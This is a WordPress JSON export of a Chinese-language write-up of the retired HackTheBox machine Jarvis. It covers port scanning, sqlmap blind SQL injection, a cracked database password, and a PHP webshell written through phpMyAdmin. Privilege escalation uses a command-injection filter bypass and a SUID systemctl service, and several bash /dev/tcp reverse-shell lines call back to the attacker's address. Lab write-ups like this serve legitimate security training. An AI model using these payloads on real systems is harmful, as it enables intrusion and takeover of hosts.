{"id":124,"date":"2024-11-13T09:32:17","date_gmt":"2024-11-13T01:32:17","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=124"},"modified":"2024-11-13T09:49:30","modified_gmt":"2024-11-13T01:49:30","slug":"htb_machine_jarvis","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_jarvis\/","title":{"rendered":"HTB\u9776\u673a Jarvis \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.143<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/jarvis\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.143\nPING 10.10.10.143 (10.10.10.143) 56(84) bytes of data.\n64 bytes from 10.10.10.143: icmp_seq=1 ttl=63 time=514 ms\n64 bytes from 10.10.10.143: icmp_seq=2 ttl=63 time=297 ms\n64 bytes from 10.10.10.143: icmp_seq=3 ttl=63 time=296 ms\n64 bytes from 10.10.10.143: icmp_seq=4 ttl=63 time=530 ms\n\n--- 10.10.10.143 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3199ms\nrtt min\/avg\/max\/mdev = 295.950\/409.264\/530.395\/113.147 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u72b6\u6001\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Sat Jul 20 08:03:40 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.143\nWarning: 10.10.10.143 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.143 (10.10.10.143)\nHost is up (0.39s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT      STATE         SERVICE\n22\/tcp    open|filtered ssh\n80\/tcp    open|filtered http\n64999\/tcp open|filtered unknown\n\n# Nmap done at Sat Jul 20 08:04:50 2024 -- 1 IP address (1 host up) scanned in 70.28 seconds<\/code><\/pre>\n
\u9776\u673a\u5f00\u653e\u4e863<\/code>\u4e2aTCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Sat Jul 20 08:07:44 2024 as: nmap -sS -sV -A -p 22,80,64999 -oN .\/tcp_result.txt 10.10.10.143\nNmap scan report for 10.10.10.143 (10.10.10.143)\nHost is up (0.34s latency).\n\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)\n|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)\n|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)\n80\/tcp    open  http    Apache httpd 2.4.25 ((Debian))\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Stark Hotel\n64999\/tcp open  http    Apache httpd 2.4.25 ((Debian))\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Site doesn't have a title (text\/html).\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 3.2 - 4.9 (96%), Android 4.2.2 (Linux 3.4) (96%), Android 4.1.2 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Android 4.1.1 (94%), DD-WRT (Linux 3.18) (94%), DD-WRT v3.0 (Linux 4.4.2) (94%), Linux 4.4 (94%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   307.85 ms 10.10.14.1 (10.10.14.1)\n2   398.58 ms 10.10.10.143 (10.10.10.143)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sat Jul 20 08:08:22 2024 -- 1 IP address (1 host up) scanned in 41.64 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Sat Jul 20 08:08:59 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.143\nWarning: 10.10.10.143 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.143 (10.10.10.143)\nHost is up (0.71s latency).\nAll 65535 scanned ports on 10.10.10.143 (10.10.10.143) are in ignored states.\nNot shown: 65166 open|filtered udp ports (no-response), 369 closed udp ports (port-unreach)\n\n# Nmap done at Sat Jul 20 08:15:14 2024 -- 1 IP address (1 host up) scanned in 375.07 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u64cd\u4f5c\u7cfb\u7edf\u4e3aDebian Linux<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/jarvis.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u67e5\u770b\u6574\u4e2a\u9875\u9762\uff0c\u5728\u9875\u9762\u5934\u90e8\u6536\u96c6\u5230\u7535\u8bdd\u53f7\u7801+123456789<\/code>\uff0c\u5728\u9875\u9762\u672b\u5c3e\u53d1\u73b0\u5982\u4e0b\u5173\u952e\u4fe1\u606f\uff1a<\/p>\n
\"\"<\/p>\n
    \n
  • \u7591\u4f3c\u7aef\u53e3\u6572\u95e8\uff1a1235<\/code>\u30012355<\/code>\u300198<\/code><\/li>\n
  • \u57df\u540d\uff1alogger.htb<\/code>\u3001supersecurehotel.htb<\/code><\/li>\n
  • \u7591\u4f3c\u7528\u6237\u540d\uff1asupersecurehotel<\/code><\/li>\n
  • \u9875\u9762\uff1aroom.php<\/code>\u3001dining-bar.php<\/code>\u3001room-suites.php<\/code><\/li>\n<\/ul>\n
    \u67e5\u770bdining-bar.php<\/code>\u548croom-suites.php<\/code>\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u5173\u952e\u4fe1\u606f\uff0c\u4e8e\u662f\u5206\u6790room.php<\/code>\u3002<\/p>\n
    \u5728\u5206\u6790\u8be5\u9875\u9762\u65f6\uff0c\u53d1\u73b0\u8be5\u9875\u9762\u9700\u8981\u4e00\u4e2aHTTP GET<\/code>\u53c2\u6570cod<\/code>\uff0c\u5185\u5bb9\u4e3a\u4e3b\u9875\u4e0a\u623f\u95f4\u7684ID<\/code>\uff0c\u5f88\u660e\u663e\u8be5\u9875\u9762\u4f7f\u7528\u4e86\u5982\u4e0bSQL<\/code>\u8bed\u53e5\uff1a<\/p>\n
    SELECT * FROM roomList WHERE room_id = {$cod}<\/code><\/pre>\n
    \u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u53d1\u73b0\u8be5\u53c2\u6570\u5b58\u5728SQL<\/code>\u5e03\u5c14\u76f2\u6ce8\u6f0f\u6d1e\uff1a<\/p>\n
    \"\"<\/p>\n
    \uff08\u53ea\u6709\u5f53\u957f\u5ea6\u503c\u4e3a<\/strong>5<\/code>\u65f6\uff0c\u9875\u9762\u624d\u8fd4\u56de\u6b63\u786e\u5185\u5bb9\uff09<\/strong><\/p>\n
    \u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
    # Dirsearch started Sat Jul 20 09:18:56 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/jarvis.htb\/ -x 400,403,404 -t 60 -e php,js,html,txt,zip,tar.gz,pcap\n\n301   305B   http:\/\/jarvis.htb\/js    -> REDIRECTS TO: http:\/\/jarvis.htb\/js\/\n301   306B   http:\/\/jarvis.htb\/css    -> REDIRECTS TO: http:\/\/jarvis.htb\/css\/\n301   308B   http:\/\/jarvis.htb\/fonts    -> REDIRECTS TO: http:\/\/jarvis.htb\/fonts\/\n200   755B   http:\/\/jarvis.htb\/footer.php\n200   816B   http:\/\/jarvis.htb\/images\/\n301   309B   http:\/\/jarvis.htb\/images    -> REDIRECTS TO: http:\/\/jarvis.htb\/images\/\n200   677B   http:\/\/jarvis.htb\/js\/\n301   313B   http:\/\/jarvis.htb\/phpmyadmin    -> REDIRECTS TO: http:\/\/jarvis.htb\/phpmyadmin\/\n200     3KB  http:\/\/jarvis.htb\/phpmyadmin\/doc\/html\/index.html\n200     1KB  http:\/\/jarvis.htb\/phpmyadmin\/README\n200    19KB  http:\/\/jarvis.htb\/phpmyadmin\/ChangeLog\n200     4KB  http:\/\/jarvis.htb\/phpmyadmin\/\n200     4KB  http:\/\/jarvis.htb\/phpmyadmin\/index.php<\/code><\/pre>\n
    \u53d1\u73b0\u4e86PHPMyAdmin<\/code>\uff0c\u6253\u5f00\u4e3b\u9875\uff0c\u53d1\u73b0\u7248\u672c\u4e3av4.8.0<\/code>\uff1a<\/p>\n
    \"\"<\/p>\n
    Web\u5e94\u7528\u7a0b\u5e8f\uff0864999\u7aef\u53e3\uff09<\/h2>\n
    \u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/jarvis.htb:64999\/<\/code><\/p>\n
    \"\"<\/p>\n
    \u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff0c\u4f46\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n
    \n
    \u6e17\u900f\u6d4b\u8bd5<\/h1>\n
    SQL\u76f2\u6ce8\u6e17\u900f<\/h2>\n
    \u786e\u5b9aroom.php<\/code>\u7684cod<\/code>\u53c2\u6570\u5b58\u5728SQL<\/code>\u76f2\u6ce8\u6f0f\u6d1e\u4e4b\u540e\uff0c\u76f4\u63a5\u4f7f\u7528SQLMap<\/code>\u9a8c\u8bc1\uff1a<\/p>\n
    sqlmap -u \"http:\/\/jarvis.htb\/room.php?cod=2\" --level 5 --risk 3<\/code><\/pre>\n
    \"\"<\/p>\n
    \u786e\u5b9a\u5f53\u524d\u6570\u636e\u5e93\u7528\u6237\u540d\u4ee5\u53ca\u5176\u662f\u5426\u4e3a\u7ba1\u7406\u5458\u7528\u6237\uff1a<\/p>\n
    sqlmap -u \"http:\/\/jarvis.htb\/room.php?cod=2\" --current-user --is-dba  --level 5 --risk 3<\/code><\/pre>\n
    \"\"<\/p>\n
    \u53d1\u73b0\u5f53\u524d\u7528\u6237\u4e3aDBadmin<\/code>\uff0c\u5177\u6709\u8d85\u7ba1\u6743\u9650\u3002<\/p>\n
    \u65e2\u7136\u5f53\u524d\u7528\u6237\u4e3a\u8d85\u7ba1\uff0c\u76f4\u63a5\u83b7\u53d6mysql.user<\/code>\u8868\u5185\u7684\u6570\u636e\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5728\u7ebf\u5de5\u5177\u7834\u89e3\u540e\u767b\u5f55PHPMyAdmin<\/code>\uff1a<\/p>\n
    sqlmap -u \"http:\/\/jarvis.htb\/room.php?cod=2\" -D mysql -T user --columns --dump --level 5 --risk 3 --output-dir=.\/sql_result<\/code><\/pre>\n
    \u6253\u5f00\u4fdd\u5b58\u7684\u7ed3\u679c\uff1a<\/p>\n
    \"\"<\/p>\n
    \u6210\u529f\u83b7\u53d6DBadmin<\/code>\u7528\u6237\u5bc6\u7801\u54c8\u5e0c\uff0c\u5c1d\u8bd5\u5728\u7ebf\u7834\u89e3\uff0c\u6210\u529f\uff1a<\/p>\n
      \n
    • \u7528\u6237\u540d\uff1aDBadmin<\/code><\/li>\n
    • \u5bc6\u7801\uff1aimissyou<\/code><\/li>\n
    • \u4e3b\u673a\uff1alocalhost<\/code><\/li>\n<\/ul>\n
      \u76f4\u63a5\u767b\u5f55PHPMyAdmin<\/code>\uff1a<\/p>\n
      \"\"<\/p>\n
      \u5199\u5165WebShell<\/h2>\n
      \u767b\u5f55PHPMyAdmin<\/code>\u4e4b\u540e\uff0c\u5c1d\u8bd5\u6267\u884c\u5982\u4e0bSQL<\/code>\u8bed\u53e5\u5199\u5165\u7f51\u9875\u6728\u9a6c\uff1a<\/p>\n
      SELECT \"<?php system($_GET['cmd']); ?>\" INTO OUTFILE \"\/var\/www\/html\/sparkle.php\";<\/code><\/pre>\n
      \"\"<\/p>\n
      \u76f4\u63a5\u4f7f\u7528BurpSuite<\/code>\u8bbf\u95ee\u5e76\u53cd\u5f39Shell\uff1a<\/p>\n
      \/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.3\/443 0>&1'<\/code><\/pre>\n
      \"\"<\/p>\n
      \u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
      \n
      \u6743\u9650\u63d0\u5347<\/h1>\n
      Sudo\u811a\u672c\u63d0\u6743<\/h2>\n
      \u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u5c1d\u8bd5\u67e5\u770b\u5f53\u524d\u7528\u6237Sudo<\/code>\u6743\u9650\uff1a<\/p>\n
      \"\"<\/p>\n
      \u53d1\u73b0\u5f53\u524d\u7528\u6237\u53ef\u4ee5pepper<\/code>\u7528\u6237\u8eab\u4efd\u514d\u5bc6\u8fd0\u884c\/var\/www\/Admin-Utilities\/simpler.py<\/code>\u6587\u4ef6\u3002\u8be5\u6587\u4ef6\u5c5e\u4e3b\u4e3apepper<\/code>\uff0c\u6743\u9650\u4e3a0744<\/code>\uff0c\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
      #!\/usr\/bin\/env python3\nfrom datetime import datetime\nimport sys\nimport os\nfrom os import listdir\nimport re\n\ndef show_help():\n    message='''\n********************************************************\n* Simpler   -   A simple simplifier ;)                 *\n* Version 1.0                                          *\n********************************************************\nUsage:  python3 simpler.py [options]\n\nOptions:\n    -h\/--help   : This help\n    -s          : Statistics\n    -l          : List the attackers IP\n    -p          : ping an attacker IP\n    '''\n    print(message)\n\ndef show_header():\n    print('''***********************************************\n     _                 _                       \n ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ \n\/ __| | '_ ` _ | '_ | |\/ _  '__| '_ | | | |\n__  | | | | | | |_) | |  __\/ |_ | |_) | |_| |\n|___\/_|_| |_| |_| .__\/|_|___|_(_)| .__\/ __, |\n                |_|               |_|    |___\/ \n                                @ironhackers.es\n\n***********************************************\n''')\n\ndef show_statistics():\n    path = '\/home\/pepper\/Web\/Logs\/'\n    print('Statisticsn-----------')\n    listed_files = listdir(path)\n    count = len(listed_files)\n    print('Number of Attackers: ' + str(count))\n    level_1 = 0\n    dat = datetime(1, 1, 1)\n    ip_list = []\n    reks = []\n    ip = ''\n    req = ''\n    rek = ''\n    for i in listed_files:\n        f = open(path + i, 'r')\n        lines = f.readlines()\n        level2, rek = get_max_level(lines)\n        fecha, requ = date_to_num(lines)\n        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]\n        if fecha > dat:\n            dat = fecha\n            req = requ\n            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]\n        if int(level2) > int(level_1):\n            level_1 = level2\n            ip_list = [ip]\n            reks=[rek]\n        elif int(level2) == int(level_1):\n            ip_list.append(ip)\n            reks.append(rek)\n        f.close()\n\n    print('Most Risky:')\n    if len(ip_list) > 1:\n        print('More than 1 ip found')\n    cont = 0\n    for i in ip_list:\n        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])\n        cont = cont + 1\n\n    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)\n\ndef list_ip():\n    print('Attackersn-----------')\n    path = '\/home\/pepper\/Web\/Logs\/'\n    listed_files = listdir(path)\n    for i in listed_files:\n        f = open(path + i,'r')\n        lines = f.readlines()\n        level,req = get_max_level(lines)\n        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)\n        f.close()\n\ndef date_to_num(lines):\n    dat = datetime(1,1,1)\n    ip = ''\n    req=''\n    for i in lines:\n        if 'Level' in i:\n            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('n')[0]\n            regex = '(d+)-(.*)-(d+)(.*)'\n            logEx=re.match(regex, fecha).groups()\n            mes = to_dict(logEx[1])\n            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]\n            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')\n            if fecha > dat:\n                dat = fecha\n                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]\n    return dat, req\n\ndef to_dict(name):\n    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}\n    return month_dict[name]\n\ndef get_max_level(lines):\n    level=0\n    for j in lines:\n        if 'Level' in j:\n            if int(j.split(' ')[4]) > int(level):\n                level = j.split(' ')[4]\n                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]\n    return level, req\n\ndef exec_ping():\n    forbidden = ['&', ';', '-', '`', '||', '|']\n    command = input('Enter an IP: ')\n    for i in forbidden:\n        if i in command:\n            print('Got you')\n            exit()\n    os.system('ping ' + command)\n\nif __name__ == '__main__':\n    show_header()\n    if len(sys.argv) != 2:\n        show_help()\n        exit()\n    if sys.argv[1] == '-h' or sys.argv[1] == '--help':\n        show_help()\n        exit()\n    elif sys.argv[1] == '-s':\n        show_statistics()\n        exit()\n    elif sys.argv[1] == '-l':\n        list_ip()\n        exit()\n    elif sys.argv[1] == '-p':\n        exec_ping()\n        exit()\n    else:\n        show_help()\n        exit()<\/code><\/pre>\n
      \u53ef\u4ee5\u770b\u5230\u53ea\u8981\u5728\u811a\u672c\u540e\u52a0\u4e0a-p<\/code>\u53c2\u6570\u5373\u53ef\u8c03\u7528exec_ping()<\/code>\u51fd\u6570\u6267\u884c\u547d\u4ee4\uff0c\u5bf9\u4e8e\u5176\u6076\u610f\u5b57\u7b26\u68c0\u67e5\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u6cd5\u89c4\u907f\uff08\u9996\u5148\u521b\u5efa<\/strong>\/tmp\/re.sh<\/code>\u53cd\u5f39Shell\u811a\u672c\uff09<\/strong>\uff1a<\/p>\n
      sudo -u pepper \/var\/www\/Admin-Utilities\/simpler.py -p\nsparkle $(\/tmp\/re.sh)<\/code><\/pre>\n
      \"\"<\/p>\n
      \u6210\u529f\uff01\uff01<\/strong><\/p>\n
      \u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n
      \u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n
      \"\"<\/p>\n
      \u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n
      \"\"<\/p>\n
      \u73af\u5883\u53d8\u91cf<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7528\u6237\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n
      \"\"<\/p>\n
      \u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\/bin\/systemctl<\/code>\u547d\u4ee4\u5177\u6709SUID<\/code>\u6743\u9650\uff0c\u51b3\u5b9a\u4ee5\u8be5\u547d\u4ee4\u4e3a\u5165\u53e3\u8fdb\u884c\u63d0\u6743\u3002<\/p>\n
      SUID systemctl\u63d0\u6743<\/h2>\n
      \u9996\u5148\u521b\u5efa\u6076\u610f\u670d\u52a1\u914d\u7f6e\u6587\u4ef6re.service<\/code>\uff1a<\/p>\n
      [Service]\nType=oneshot\nExecStart=\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.3\/5555 0>&1'\n[Install]\nWantedBy=multi-user.target<\/code><\/pre>\n
      \u968f\u540e\u5c06\u5176\u4e0b\u8f7d\u5230\u9776\u673a\u7684\/dev\/shm<\/code>\u7cfb\u7edf\u7269\u7406\u5185\u5b58\u6302\u8f7d\u76ee\u5f55\u4e0b\uff1a<\/p>\n
      wget http:\/\/10.10.14.3\/re.service\nmkdir \/dev\/shm\/evil\ncp .\/re.service \/dev\/shm\/evil\/re.service<\/code><\/pre>\n
      \u968f\u540e\u4f7f\u7528systemctl<\/code>\u6ce8\u518c\u5e76\u8fd0\u884c\u6076\u610f\u670d\u52a1\uff1a<\/p>\n
      \/bin\/systemctl link \/dev\/shm\/evil\/re.service\n\/bin\/systemctl enable --now \/dev\/shm\/evil\/re.service<\/code><\/pre>\n
      \"\"<\/p>\n
      \u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
      \n
      Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
      48f41dcba85de2466013bad062c1a750<\/code><\/pre>\n
      \n
      \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
      \n","protected":false},"excerpt":{"rendered":"
      \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.143 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-124","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/124","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=124"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/124\/revisions"}],"predecessor-version":[{"id":125,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/124\/revisions\/125"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}